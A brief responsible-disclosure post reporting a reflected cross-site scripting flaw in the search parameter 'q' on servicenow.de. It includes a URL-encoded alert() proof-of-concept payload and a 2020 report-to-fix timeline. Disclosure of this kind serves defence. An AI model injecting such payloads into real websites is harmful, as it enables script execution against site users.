Vulnerability : Cross-Site Scripting (XSS) - Reflected
Domain : https://www.servicenow.de
Vulnerable URL : https://www.servicenow.de/search-result.html?q=
Vulnerable Parameter : q
XSS Payload (Encoded) : %27%3E%3Cscript%3Ealert(%22XSS%20By%20Nayanjyoti%20Roy%22);%3C/script%3E
Timeline :
Mar 18,2020 - Report Sent
Mar 18,2020 - Confirmation received
Apr 21,2020 - Vulnerability Fixed
Environment :
OS : Windows 10 Enterprise
Browser : Firefox
Version : 74.0 ( 64-bit )
Researcher Name : Nayanjyoti Roy
Proof-Of-Concept video :
0 Comments